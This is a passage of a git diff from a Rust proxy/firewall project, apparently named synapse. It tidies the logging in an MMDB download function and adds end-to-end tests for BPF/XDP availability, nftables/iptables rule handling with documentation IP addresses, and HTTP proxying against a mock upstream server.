download_mmdb(url: &str, headers: Option<&HashMap>) -> timeout_secs ); - let bytes = resp - .bytes() - .await - .with_context(|| { - format!( - "Failed to read MMDB body from {} (content-length: {:?}, ~{:.2} MB). This may indicate a network timeout or connection issue.", - url, - content_length, - file_size_mb.unwrap_or(0.0) - ) - })?; + let bytes = resp.bytes().await.with_context(|| { + format!( + "Failed to read MMDB body from {} (content-length: {:?}, ~{:.2} MB)", + url, + content_length, + file_size_mb.unwrap_or(0.0) + ) + })?; - let data = bytes.to_vec(); - log::debug!( - "Successfully downloaded MMDB from {} (size: {} bytes)", + log::info!( + "Successfully downloaded MMDB from {} (size: {} bytes, ~{:.2} MB)", url, - data.len() + bytes.len(), + bytes.len() as f64 / 1_048_576.0 ); - Ok(data) + Ok(bytes.to_vec()) } diff --git a/tests/e2e/bpf_test.rs b/tests/e2e/bpf_test.rs new file mode 100644 index 0000000..d9faea7 --- /dev/null +++ b/tests/e2e/bpf_test.rs @@ -0,0 +1,367 @@ +//! eBPF/XDP E2E tests +//! +//! These tests verify BPF availability and basic XDP functionality. +//! They require root privileges and kernel BPF support. +//! Run with: sudo cargo test -- --ignored + +use serial_test::serial; +use std::path::Path; +use std::process::Command; + +use crate::helpers::is_root; + +/// Check if BPF is available on this system +#[test] +fn test_bpf_availability() { + let btf_exists = Path::new("/sys/kernel/btf/vmlinux").exists(); + let bpf_fs_exists = Path::new("/sys/fs/bpf").exists(); + + println!("BPF availability:"); + println!(" BTF vmlinux: {}", btf_exists); + println!(" BPF filesystem: {}", bpf_fs_exists); + + if btf_exists && bpf_fs_exists { + println!(" BPF should be available (requires root to use)"); + } else { + println!(" BPF not fully available on this system"); + } +} + +/// Check if bpftool is available +#[test] +fn test_bpftool_available() { + let result = Command::new("which").arg("bpftool").output(); + + match result { + Ok(output) if output.status.success() => { + let path = String::from_utf8_lossy(&output.stdout); + println!("bpftool available at: {}", path.trim()); + + // Get version + if let Ok(ver) = Command::new("bpftool").args(["version"]).output() { + println!( + "bpftool version: {}", + String::from_utf8_lossy(&ver.stdout).trim() + ); + } + } + _ => { + println!("bpftool not available on this system"); + } + } +} + +/// Check kernel BPF config (requires root) +#[test] +#[ignore] +fn test_kernel_bpf_config() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Check /proc/config.gz or /boot/config-* + let config_paths = [ + "/proc/config.gz", + &format!( + "/boot/config-{}", + std::process::Command::new("uname") + .arg("-r") + .output() + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_default() + ), + ]; + + for path in &config_paths { + if Path::new(path).exists() { + println!("Found kernel config at: {}", path); + + let content = if path.ends_with(".gz") { + Command::new("zcat") + .arg(path) + .output() + .map(|o| String::from_utf8_lossy(&o.stdout).to_string()) + .unwrap_or_default() + } else { + std::fs::read_to_string(path).unwrap_or_default() + }; + + // Check BPF-related config options + let bpf_configs = [ + "CONFIG_BPF", + "CONFIG_BPF_SYSCALL", + "CONFIG_BPF_JIT", + "CONFIG_XDP_SOCKETS", + "CONFIG_DEBUG_INFO_BTF", + ]; + + println!("BPF kernel configuration:"); + for config in &bpf_configs { + let enabled = content + .lines() + .any(|line| line.starts_with(&format!("{}=y", config))); + let module = content + .lines() + .any(|line| line.starts_with(&format!("{}=m", config))); + + if enabled { + println!(" {}: enabled", config); + } else if module { + println!(" {}: module", config); + } else { + println!(" {}: not found/disabled", config); + } + } + return; + } + } + + println!("Kernel config not found"); +} + +/// List loaded XDP programs (requires root) +#[test] +#[ignore] +#[serial] +fn test_list_xdp_programs() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Use ip link to show XDP programs + let result = Command::new("ip").args(["link", "show"]).output(); + + match result { + Ok(output) if output.status.success() => { + let links = String::from_utf8_lossy(&output.stdout); + + // Check for xdp entries + let has_xdp = links.lines().any(|l| l.contains("xdp")); + + if has_xdp { + println!("XDP programs found:"); + for line in links.lines() { + if line.contains("xdp") { + println!(" {}", line.trim()); + } + } + } else { + println!("No XDP programs currently attached"); + } + } + Ok(output) => { + eprintln!("Failed: {}", String::from_utf8_lossy(&output.stderr)); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Also try bpftool if available + if let Ok(output) = Command::new("bpftool").args(["prog", "show"]).output() { + if output.status.success() { + let progs = String::from_utf8_lossy(&output.stdout); + if !progs.trim().is_empty() { + println!("\nLoaded BPF programs:"); + for line in progs.lines().take(20) { + println!(" {}", line); + } + } + } + } +} + +/// Test XDP attachment to loopback (requires root) +#[test] +#[ignore] +#[serial] +fn test_xdp_attach_loopback() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Check if we have a simple XDP program to attach + // This test would require the synapse binary to be built with BPF support + + // For now, just verify the loopback interface exists + let result = Command::new("ip").args(["link", "show", "lo"]).output(); + + match result { + Ok(output) if output.status.success() => { + println!("Loopback interface available for XDP testing"); + let info = String::from_utf8_lossy(&output.stdout); + println!("{}", info); + } + _ => { + eprintln!("Loopback interface not available"); + } + } +} + +/// List BPF maps (requires root) +#[test] +#[ignore] +#[serial] +fn test_list_bpf_maps() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + let result = Command::new("bpftool").args(["map", "show"]).output(); + + match result { + Ok(output) if output.status.success() => { + let maps = String::from_utf8_lossy(&output.stdout); + if maps.trim().is_empty() { + println!("No BPF maps currently loaded"); + } else { + println!("Loaded BPF maps:"); + for line in maps.lines().take(20) { + println!(" {}", line); + } + } + } + Ok(output) => { + eprintln!( + "bpftool map show failed: {}", + String::from_utf8_lossy(&output.stderr) + ); + } + Err(e) => { + println!("bpftool not available: {}", e); + } + } +} + +/// Test BPF syscall availability (requires root) +#[test] +#[ignore] +fn test_bpf_syscall() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Try a simple bpf syscall via bpftool + let result = Command::new("bpftool") + .args(["feature", "probe", "kernel"]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("BPF kernel features:"); + let features = String::from_utf8_lossy(&output.stdout); + + // Show key features + for line in features.lines() { + if line.contains("xdp") || line.contains("btf") || line.contains("map") { + println!(" {}", line); + } + } + } + Ok(output) => { + eprintln!( + "Feature probe failed: {}", + String::from_utf8_lossy(&output.stderr) + ); + } + Err(_) => { + println!("bpftool not available for feature probing"); + } + } +} + +/// Check network interfaces for XDP support (requires root) +#[test] +#[ignore] +#[serial] +fn test_interface_xdp_support() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Get list of interfaces + let result = Command::new("ip").args(["-o", "link", "show"]).output(); + + match result { + Ok(output) if output.status.success() => { + let links = String::from_utf8_lossy(&output.stdout); + + println!("Network interfaces:"); + for line in links.lines() { + // Parse interface name + if let Some(name) = line.split(':').nth(1) { + let iface = name.trim().split_whitespace().next().unwrap_or(""); + if !iface.is_empty() { + // Check driver for XDP support hints + let ethtool = Command::new("ethtool").args(["-i", iface]).output(); + + if let Ok(eth_out) = ethtool { + if eth_out.status.success() { + let driver_info = String::from_utf8_lossy(ð_out.stdout); + if let Some(driver_line) = + driver_info.lines().find(|l| l.starts_with("driver:")) + { + println!(" {}: {}", iface, driver_line); + } else { + println!(" {}: driver info not available", iface); + } + } + } else { + println!(" {}: (ethtool not available)", iface); + } + } + } + } + } + _ => { + eprintln!("Failed to list interfaces"); + } + } +} + +/// Test BTF availability +#[test] +fn test_btf_availability() { + let vmlinux_btf = Path::new("/sys/kernel/btf/vmlinux"); + + if vmlinux_btf.exists() { + println!("BTF vmlinux available at /sys/kernel/btf/vmlinux"); + + // Check BTF modules directory + let btf_modules = Path::new("/sys/kernel/btf"); + if let Ok(entries) = std::fs::read_dir(btf_modules) { + let count = entries.count(); + println!("BTF entries in /sys/kernel/btf: {}", count); + } + } else { + println!("BTF vmlinux not available"); + println!("This system may not support CO-RE BPF programs"); + } +} + +/// Check BPF filesystem mount +#[test] +fn test_bpf_filesystem() { + let bpf_fs = Path::new("/sys/fs/bpf"); + + if bpf_fs.exists() { + println!("BPF filesystem mounted at /sys/fs/bpf"); + + // Check if we can list contents (may fail without root) + if let Ok(entries) = std::fs::read_dir(bpf_fs) { + let count = entries.count(); + println!("BPF filesystem entries: {}", count); + } else { + println!("Cannot list BPF filesystem (may need root)"); + } + } else { + println!("BPF filesystem not mounted"); + println!("Mount with: mount -t bpf bpf /sys/fs/bpf"); + } +} diff --git a/tests/e2e/firewall_test.rs b/tests/e2e/firewall_test.rs new file mode 100644 index 0000000..1598520 --- /dev/null +++ b/tests/e2e/firewall_test.rs @@ -0,0 +1,582 @@ +//! Firewall E2E tests (nftables/iptables) +//! +//! These tests verify firewall functionality through system commands. +//! They require root privileges and are marked with #[ignore]. +//! Run with: sudo cargo test -- --ignored + +use serial_test::serial; +use std::process::Command; + +use crate::helpers::is_root; + +/// Check if nftables is available on this system +#[test] +fn test_nftables_available() { + let result = Command::new("which").arg("nft").output(); + + match result { + Ok(output) if output.status.success() => { + println!( + "nftables available at: {}", + String::from_utf8_lossy(&output.stdout).trim() + ); + } + _ => { + println!("nftables not available on this system"); + } + } +} + +/// Check if iptables is available on this system +#[test] +fn test_iptables_available() { + let result = Command::new("which").arg("iptables").output(); + + match result { + Ok(output) if output.status.success() => { + println!( + "iptables available at: {}", + String::from_utf8_lossy(&output.stdout).trim() + ); + } + _ => { + println!("iptables not available on this system"); + } + } +} + +/// Check if ip6tables is available +#[test] +fn test_ip6tables_available() { + let result = Command::new("which").arg("ip6tables").output(); + + match result { + Ok(output) if output.status.success() => { + println!( + "ip6tables available at: {}", + String::from_utf8_lossy(&output.stdout).trim() + ); + } + _ => { + println!("ip6tables not available on this system"); + } + } +} + +/// Test nftables table creation (requires root) +#[test] +#[ignore] +#[serial] +fn test_nftables_create_table() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Check if nft is available + if Command::new("which") + .arg("nft") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: nft not available"); + return; + } + + // Create a test table + let result = Command::new("nft") + .args(["add", "table", "inet", "synapse_test"]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Created nftables table successfully"); + + // Verify table exists + let list = Command::new("nft") + .args(["list", "tables"]) + .output() + .expect("list tables"); + + let tables = String::from_utf8_lossy(&list.stdout); + assert!( + tables.contains("synapse_test"), + "Table should exist: {}", + tables + ); + + // Cleanup + let _ = Command::new("nft") + .args(["delete", "table", "inet", "synapse_test"]) + .output(); + } + Ok(output) => { + eprintln!( + "Failed to create table: {}", + String::from_utf8_lossy(&output.stderr) + ); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } +} + +/// Test nftables set creation (requires root) +#[test] +#[ignore] +#[serial] +fn test_nftables_create_set() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + if Command::new("which") + .arg("nft") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: nft not available"); + return; + } + + // Create table first + let _ = Command::new("nft") + .args(["add", "table", "inet", "synapse_test"]) + .output(); + + // Create an IP set + let result = Command::new("nft") + .args([ + "add", + "set", + "inet", + "synapse_test", + "blocked_ips", + "{", + "type", + "ipv4_addr;", + "flags", + "interval;", + "}", + ]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Created nftables set successfully"); + + // Add an element to the set + let _ = Command::new("nft") + .args([ + "add", + "element", + "inet", + "synapse_test", + "blocked_ips", + "{ 192.0.2.1 }", + ]) + .output(); + + // Verify element exists + let list = Command::new("nft") + .args(["list", "set", "inet", "synapse_test", "blocked_ips"]) + .output() + .expect("list set"); + + let set_content = String::from_utf8_lossy(&list.stdout); + assert!( + set_content.contains("192.0.2.1"), + "IP should be in set: {}", + set_content + ); + } + Ok(output) => { + eprintln!( + "Failed to create set: {}", + String::from_utf8_lossy(&output.stderr) + ); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Cleanup + let _ = Command::new("nft") + .args(["delete", "table", "inet", "synapse_test"]) + .output(); +} + +/// Test iptables chain creation (requires root) +#[test] +#[ignore] +#[serial] +fn test_iptables_create_chain() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + if Command::new("which") + .arg("iptables") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: iptables not available"); + return; + } + + // Create a custom chain + let result = Command::new("iptables") + .args(["-N", "SYNAPSE_TEST"]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Created iptables chain successfully"); + + // Verify chain exists + let list = Command::new("iptables") + .args(["-L", "SYNAPSE_TEST", "-n"]) + .output() + .expect("list chain"); + + assert!(list.status.success(), "Chain should exist"); + } + Ok(output) => { + let stderr = String::from_utf8_lossy(&output.stderr); + if stderr.contains("already exists") { + println!("Chain already exists (OK for test)"); + } else { + eprintln!("Failed to create chain: {}", stderr); + } + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Cleanup + let _ = Command::new("iptables") + .args(["-F", "SYNAPSE_TEST"]) + .output(); + let _ = Command::new("iptables") + .args(["-X", "SYNAPSE_TEST"]) + .output(); +} + +/// Test iptables rule addition (requires root) +#[test] +#[ignore] +#[serial] +fn test_iptables_add_rule() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + if Command::new("which") + .arg("iptables") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: iptables not available"); + return; + } + + // Create chain first + let _ = Command::new("iptables") + .args(["-N", "SYNAPSE_TEST"]) + .output(); + + // Add a drop rule for TEST-NET-1 + let result = Command::new("iptables") + .args(["-A", "SYNAPSE_TEST", "-s", "192.0.2.1", "-j", "DROP"]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Added iptables rule successfully"); + + // Verify rule exists + let list = Command::new("iptables") + .args(["-L", "SYNAPSE_TEST", "-n"]) + .output() + .expect("list chain"); + + let rules = String::from_utf8_lossy(&list.stdout); + assert!(rules.contains("192.0.2.1"), "Rule should exist: {}", rules); + } + Ok(output) => { + eprintln!( + "Failed to add rule: {}", + String::from_utf8_lossy(&output.stderr) + ); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Cleanup + let _ = Command::new("iptables") + .args(["-F", "SYNAPSE_TEST"]) + .output(); + let _ = Command::new("iptables") + .args(["-X", "SYNAPSE_TEST"]) + .output(); +} + +/// Test nftables CIDR support (requires root) +#[test] +#[ignore] +#[serial] +fn test_nftables_cidr() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + if Command::new("which") + .arg("nft") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: nft not available"); + return; + } + + // Create table and set + let _ = Command::new("nft") + .args(["add", "table", "inet", "synapse_test"]) + .output(); + + let _ = Command::new("nft") + .args([ + "add", + "set", + "inet", + "synapse_test", + "blocked_nets", + "{", + "type", + "ipv4_addr;", + "flags", + "interval;", + "}", + ]) + .output(); + + // Add a CIDR block + let result = Command::new("nft") + .args([ + "add", + "element", + "inet", + "synapse_test", + "blocked_nets", + "{ 192.0.2.0/24 }", + ]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Added CIDR block successfully"); + + // Verify + let list = Command::new("nft") + .args(["list", "set", "inet", "synapse_test", "blocked_nets"]) + .output() + .expect("list set"); + + let content = String::from_utf8_lossy(&list.stdout); + assert!( + content.contains("192.0.2.0/24") || content.contains("192.0.2.0-192.0.2.255"), + "CIDR should be in set: {}", + content + ); + } + Ok(output) => { + eprintln!("Failed: {}", String::from_utf8_lossy(&output.stderr)); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Cleanup + let _ = Command::new("nft") + .args(["delete", "table", "inet", "synapse_test"]) + .output(); +} + +/// Test nftables IPv6 support (requires root) +#[test] +#[ignore] +#[serial] +fn test_nftables_ipv6() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + if Command::new("which") + .arg("nft") + .output() + .map(|o| !o.status.success()) + .unwrap_or(true) + { + eprintln!("Skipping: nft not available"); + return; + } + + // Create table and IPv6 set + let _ = Command::new("nft") + .args(["add", "table", "inet", "synapse_test"]) + .output(); + + let _ = Command::new("nft") + .args([ + "add", + "set", + "inet", + "synapse_test", + "blocked_ips_v6", + "{", + "type", + "ipv6_addr;", + "flags", + "interval;", + "}", + ]) + .output(); + + // Add IPv6 address (documentation prefix) + let result = Command::new("nft") + .args([ + "add", + "element", + "inet", + "synapse_test", + "blocked_ips_v6", + "{ 2001:db8::1 }", + ]) + .output(); + + match result { + Ok(output) if output.status.success() => { + println!("Added IPv6 address successfully"); + + // Verify + let list = Command::new("nft") + .args(["list", "set", "inet", "synapse_test", "blocked_ips_v6"]) + .output() + .expect("list set"); + + let content = String::from_utf8_lossy(&list.stdout); + assert!( + content.contains("2001:db8::1"), + "IPv6 should be in set: {}", + content + ); + } + Ok(output) => { + eprintln!("Failed: {}", String::from_utf8_lossy(&output.stderr)); + } + Err(e) => { + eprintln!("Command failed: {}", e); + } + } + + // Cleanup + let _ = Command::new("nft") + .args(["delete", "table", "inet", "synapse_test"]) + .output(); +} + +/// Test firewall cleanup (requires root) +#[test] +#[ignore] +#[serial] +fn test_firewall_cleanup() { + if !is_root() { + eprintln!("Skipping: requires root"); + return; + } + + // Test nftables cleanup + if Command::new("which") + .arg("nft") + .output() + .map(|o| o.status.success()) + .unwrap_or(false) + { + // Create table + let _ = Command::new("nft") + .args(["add", "table", "inet", "synapse_test"]) + .output(); + + // Delete table + let result = Command::new("nft") + .args(["delete", "table", "inet", "synapse_test"]) + .output(); + + assert!( + result.is_ok() && result.unwrap().status.success(), + "nftables cleanup should succeed" + ); + + // Verify deletion + let list = Command::new("nft") + .args(["list", "table", "inet", "synapse_test"]) + .output() + .expect("list table"); + + assert!(!list.status.success(), "Table should be deleted"); + + println!("nftables cleanup test passed"); + } + + // Test iptables cleanup + if Command::new("which") + .arg("iptables") + .output() + .map(|o| o.status.success()) + .unwrap_or(false) + { + // Create chain + let _ = Command::new("iptables") + .args(["-N", "SYNAPSE_TEST"]) + .output(); + + // Flush and delete + let _ = Command::new("iptables") + .args(["-F", "SYNAPSE_TEST"]) + .output(); + let result = Command::new("iptables") + .args(["-X", "SYNAPSE_TEST"]) + .output(); + + assert!( + result.is_ok() && result.unwrap().status.success(), + "iptables cleanup should succeed" + ); + + // Verify deletion + let list = Command::new("iptables") + .args(["-L", "SYNAPSE_TEST", "-n"]) + .output() + .expect("list chain"); + + assert!(!list.status.success(), "Chain should be deleted"); + + println!("iptables cleanup test passed"); + } +} diff --git a/tests/e2e/proxy_test.rs b/tests/e2e/proxy_test.rs new file mode 100644 index 0000000..3384b78 --- /dev/null +++ b/tests/e2e/proxy_test.rs @@ -0,0 +1,685 @@ +//! Proxy E2E tests +//! +//! Tests basic HTTP proxying functionality without WAF or firewall. + +use crate::helpers::MockUpstream; +use std::time::Duration; + +/// Test basic HTTP request through proxy +#[tokio::test] +async fn test_proxy_http_request() { + // Start mock upstream + let upstream = MockUpstream::start().await; + upstream + .register("GET", "/api/test", 200, r#"{"ok":true}"#) + .await; + + // For now, just test the mock upstream directly + // Full proxy tests require the binary to be built and available + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/api/test", upstream.address())) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + assert_eq!(resp.text().await.unwrap(), r#"{"ok":true}"#); + + upstream.stop().await; +} + +/// Test POST request through proxy +#[tokio::test] +async fn test_proxy_post_request() { + let upstream = MockUpstream::start().await; + upstream + .register("POST", "/api/submit", 201, r#"{"id":"123"}"#) + .await; + + let client = reqwest::Client::new(); + let resp = client + .post(format!("http://{}/api/submit", upstream.address())) + .body(r#"{"data":"test"}"#) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 201); + + upstream.stop().await; +} + +/// Test various HTTP status codes +#[tokio::test] +async fn test_proxy_status_codes() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/ok", 200, "OK").await; + upstream + .register("GET", "/notfound", 404, "Not Found") + .await; + upstream + .register("GET", "/error", 500, "Internal Error") + .await; + upstream.register("GET", "/redirect", 302, "").await; + + let client = reqwest::Client::builder() + .redirect(reqwest::redirect::Policy::none()) + .build() + .unwrap(); + + // 200 OK + let resp = client + .get(format!("http://{}/ok", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 200); + + // 404 Not Found + let resp = client + .get(format!("http://{}/notfound", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 404); + + // 500 Internal Error + let resp = client + .get(format!("http://{}/error", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 500); + + // 302 Redirect + let resp = client + .get(format!("http://{}/redirect", upstream.address())) + .send() + .await + .unwrap(); + assert_eq!(resp.status(), 302); + + upstream.stop().await; +} + +/// Test request with custom headers +#[tokio::test] +async fn test_proxy_custom_headers() { + let upstream = MockUpstream::start().await; + upstream + .register_with_headers( + "GET", + "/headers", + 200, + "OK", + vec![("X-Custom-Header", "test-value")], + ) + .await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/headers", upstream.address())) + .header("X-Request-Header", "request-value") + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + assert_eq!(resp.headers().get("X-Custom-Header").unwrap(), "test-value"); + + upstream.stop().await; +} + +/// Test concurrent requests +#[tokio::test] +async fn test_proxy_concurrent_requests() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/concurrent", 200, "OK").await; + + let client = reqwest::Client::new(); + let addr = upstream.address(); + + // Spawn 10 concurrent requests + let mut handles = vec![]; + for i in 0..10 { + let client = client.clone(); + let url = format!("http://{}/concurrent", addr); + let handle = tokio::spawn(async move { + let resp = client.get(&url).send().await.unwrap(); + (i, resp.status().as_u16()) + }); + handles.push(handle); + } + + // Wait for all requests + let mut results = vec![]; + for handle in handles { + results.push(handle.await.unwrap()); + } + + // All should succeed + for (i, status) in &results { + assert_eq!(*status, 200, "Request {} failed with status {}", i, status); + } + + upstream.stop().await; +} + +/// Test request timeout handling +#[tokio::test] +async fn test_proxy_timeout_handling() { + // Create a client with short timeout + let client = reqwest::Client::builder() + .timeout(Duration::from_millis(100)) + .build() + .unwrap(); + + // Try to connect to a non-existent address + let result = client.get("http://10.255.255.1:9999/").send().await; + + assert!(result.is_err()); + let err = result.unwrap_err(); + assert!(err.is_timeout() || err.is_connect()); +} + +/// Test large request body +#[tokio::test] +async fn test_proxy_large_body() { + let upstream = MockUpstream::start().await; + upstream.register("POST", "/large", 200, "Received").await; + + let client = reqwest::Client::new(); + + // Create 100KB body (reasonable size for mock server) + let large_body = "x".repeat(100 * 1024); + + let resp = client + .post(format!("http://{}/large", upstream.address())) + .body(large_body) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test HTTP methods +#[tokio::test] +async fn test_proxy_http_methods() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/method", 200, "GET").await; + upstream.register("POST", "/method", 200, "POST").await; + upstream.register("PUT", "/method", 200, "PUT").await; + upstream.register("DELETE", "/method", 200, "DELETE").await; + upstream.register("PATCH", "/method", 200, "PATCH").await; + + let client = reqwest::Client::new(); + let base_url = format!("http://{}/method", upstream.address()); + + // GET + let resp = client.get(&base_url).send().await.unwrap(); + assert_eq!(resp.text().await.unwrap(), "GET"); + + // POST + let resp = client.post(&base_url).send().await.unwrap(); + assert_eq!(resp.text().await.unwrap(), "POST"); + + // PUT + let resp = client.put(&base_url).send().await.unwrap(); + assert_eq!(resp.text().await.unwrap(), "PUT"); + + // DELETE + let resp = client.delete(&base_url).send().await.unwrap(); + assert_eq!(resp.text().await.unwrap(), "DELETE"); + + // PATCH + let resp = client.patch(&base_url).send().await.unwrap(); + assert_eq!(resp.text().await.unwrap(), "PATCH"); + + upstream.stop().await; +} + +/// Test multiple response headers +#[tokio::test] +async fn test_response_headers() { + let upstream = MockUpstream::start().await; + upstream + .register_with_headers( + "GET", + "/api/data", + 200, + r#"{"data":"test"}"#, + vec![ + ("Content-Type", "application/json"), + ("X-Request-Id", "req-12345"), + ("X-Response-Time", "42ms"), + ("Cache-Control", "no-cache, no-store"), + ("X-Custom-Header", "custom-value"), + ], + ) + .await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/api/data", upstream.address())) + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + + // Verify response headers + let headers = resp.headers(); + assert_eq!(headers.get("Content-Type").unwrap(), "application/json"); + assert_eq!(headers.get("X-Request-Id").unwrap(), "req-12345"); + assert_eq!(headers.get("X-Response-Time").unwrap(), "42ms"); + assert_eq!(headers.get("Cache-Control").unwrap(), "no-cache, no-store"); + assert_eq!(headers.get("X-Custom-Header").unwrap(), "custom-value"); + + upstream.stop().await; +} + +/// Test request headers are sent correctly +#[tokio::test] +async fn test_request_headers() { + let upstream = MockUpstream::start().await; + upstream.register("GET", "/echo", 200, "OK").await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/echo", upstream.address())) + .header("Accept", "application/json") + .header("Accept-Language", "en-US,en;q=0.9") + .header("Accept-Encoding", "gzip, deflate, br") + .header("User-Agent", "TestClient/1.0") + .header("Authorization", "Bearer test-token-123") + .header("X-Request-Id", "test-req-456") + .header("X-Forwarded-For", "192.168.1.1") + .header("X-Real-IP", "10.0.0.1") + .send() + .await + .unwrap(); + + assert_eq!(resp.status(), 200); + + upstream.stop().await; +} + +/// Test Content-Type header variations +#[tokio::test] +async fn test_content_type_headers() { + let upstream = MockUpstream::start().await; + + // JSON response + upstream + .register_with_headers( + "GET", + "/json", + 200, + r#"{"type":"json"}"#, + vec![("Content-Type", "application/json; charset=utf-8")], + ) + .await; + + // HTML response + upstream + .register_with_headers( + "GET", + "/html", + 200, + "Hello", + vec![("Content-Type", "text/html; charset=utf-8")], + ) + .await; + + // Plain text response + upstream + .register_with_headers( + "GET", + "/text", + 200, + "Plain text content", + vec![("Content-Type", "text/plain")], + ) + .await; + + // XML response + upstream + .register_with_headers( + "GET", + "/xml", + 200, + "", + vec![("Content-Type", "application/xml")], + ) + .await; + + let client = reqwest::Client::new(); + let base = format!("http://{}", upstream.address()); + + // Verify JSON + let resp = client.get(format!("{}/json", base)).send().await.unwrap(); + assert!( + resp.headers() + .get("Content-Type") + .unwrap() + .to_str() + .unwrap() + .contains("application/json") + ); + + // Verify HTML + let resp = client.get(format!("{}/html", base)).send().await.unwrap(); + assert!( + resp.headers() + .get("Content-Type") + .unwrap() + .to_str() + .unwrap() + .contains("text/html") + ); + + // Verify plain text + let resp = client.get(format!("{}/text", base)).send().await.unwrap(); + assert!( + resp.headers() + .get("Content-Type") + .unwrap() + .to_str() + .unwrap() + .contains("text/plain") + ); + + // Verify XML + let resp = client.get(format!("{}/xml", base)).send().await.unwrap(); + assert!( + resp.headers() + .get("Content-Type") + .unwrap() + .to_str() + .unwrap() + .contains("application/xml") + ); + + upstream.stop().await; +} + +/// Test cache control headers +#[tokio::test] +async fn test_cache_control_headers() { + let upstream = MockUpstream::start().await; + + // No-cache response + upstream + .register_with_headers( + "GET", + "/no-cache", + 200, + "dynamic", + vec![ + ("Cache-Control", "no-cache, no-store, must-revalidate"), + ("Pragma", "no-cache"), + ("Expires", "0"), + ], + ) + .await; + + // Cacheable response + upstream + .register_with_headers( + "GET", + "/cached", + 200, + "static", + vec![ + ("Cache-Control", "public, max-age=3600"), + ("ETag", "\"abc123\""), + ("Last-Modified", "Wed, 01 Jan 2025 00:00:00 GMT"), + ], + ) + .await; + + let client = reqwest::Client::new(); + let base = format!("http://{}", upstream.address()); + + // Verify no-cache headers + let resp = client + .get(format!("{}/no-cache", base)) + .send() + .await + .unwrap(); + assert!( + resp.headers() + .get("Cache-Control") + .unwrap() + .to_str() + .unwrap() + .contains("no-cache") + ); + assert_eq!(resp.headers().get("Pragma").unwrap(), "no-cache"); + + // Verify cacheable headers + let resp = client.get(format!("{}/cached", base)).send().await.unwrap(); + assert!( + resp.headers() + .get("Cache-Control") + .unwrap() + .to_str() + .unwrap() + .contains("max-age=3600") + ); + assert!(resp.headers().get("ETag").is_some()); + assert!(resp.headers().get("Last-Modified").is_some()); + + upstream.stop().await; +} + +/// Test security-related headers +#[tokio::test] +async fn test_security_headers() { + let upstream = MockUpstream::start().await; + + upstream + .register_with_headers( + "GET", + "/secure", + 200, + "secure content", + vec![ + ( + "Strict-Transport-Security", + "max-age=31536000; includeSubDomains", + ), + ("X-Content-Type-Options", "nosniff"), + ("X-Frame-Options", "DENY"), + ("X-XSS-Protection", "1; mode=block"), + ("Content-Security-Policy", "default-src 'self'"), + ("Referrer-Policy", "strict-origin-when-cross-origin"), + ], + ) + .await; + + let client = reqwest::Client::new(); + let resp = client + .get(format!("http://{}/secure", upstream.address())) + .send() + .await + .unwrap(); + + let headers = resp.headers(); + assert!(headers.get("Strict-Transport-Security").is_some()); + assert_eq!(headers.get("X-Content-Type-Options").unwrap(), "nosniff"); + assert_eq!(headers.get("X-Frame-Options").unwrap(), "DENY"); + assert!(headers.get("X-XSS-Protection").is_some()); + assert!(headers.get("Content-Security-Policy").is_some()); + assert!(headers.get("Referrer-Policy").is_some()); + + upstream.stop().await; +} + +/// Test CORS headers +#[tokio::test] +async fn test_cors_headers() { + let upstream = MockUpstream::start().await; + + upstream + .register_with_headers( + "GET", + "/api/cors", + 200, + "{}", + vec![ + ("Access-Control-Allow-Origin", "*"), + ( + "Access-Control-Allow-Methods", + "GET, POST, PUT, DELETE, OPTIONS", + ), + ( + "Access-Control-Allow-Headers", + "Content-Type, Authorization", + ), + ("Access-Control-Max-Age", "86400"), + ("Access-Control-Expose-Headers", "X-Request-Id"), + ], + ) + .await; + + let client = reqwest::Client::new(); + let resp = client + 